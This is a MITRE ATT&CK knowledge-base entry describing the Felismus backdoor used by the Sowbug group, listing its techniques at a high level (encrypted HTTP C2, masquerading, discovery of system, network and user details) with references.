Felismus

Felismus is a modular backdoor that has been used by Sowbug. [1] [2]

ID: S0171
Type: MALWARE
Platforms: Windows
Version: 1.0

Techniques Used

Domain ID Name Use
Enterprise T1059 Command-Line Interface

Felismus uses command line for execution.[2]

Enterprise T1024 Custom Cryptographic Protocol

Some Felismus samples use a custom encryption method for C2 traffic using AES, base64 encoding, and multiple keys.[2]

Enterprise T1036 Masquerading

Felismus has masqueraded as legitimate Adobe Content Management System files.[2]

Enterprise T1105 Remote File Copy

Felismus can download files from remote servers.[2]

Enterprise T1063 Security Software Discovery

Felismus checks for processes associated with anti-virus vendors.[2]

Enterprise T1071 Standard Application Layer Protocol

Felismus uses HTTP for C2.[2]

Enterprise T1032 Standard Cryptographic Protocol

Some Felismus samples use AES to encrypt C2 traffic.[2]

Enterprise T1082 System Information Discovery

Felismus collects the system information, including hostname and OS version, and sends it to the C2 server.[2]

Enterprise T1016 System Network Configuration Discovery

Felismus collects the victim LAN IP address and sends it to the C2 server.[2]

Enterprise T1033 System Owner/User Discovery

Felismus collects the current username and sends it to the C2 server.[2]

Groups That Use This Software

ID Name References
G0054 Sowbug [1]

References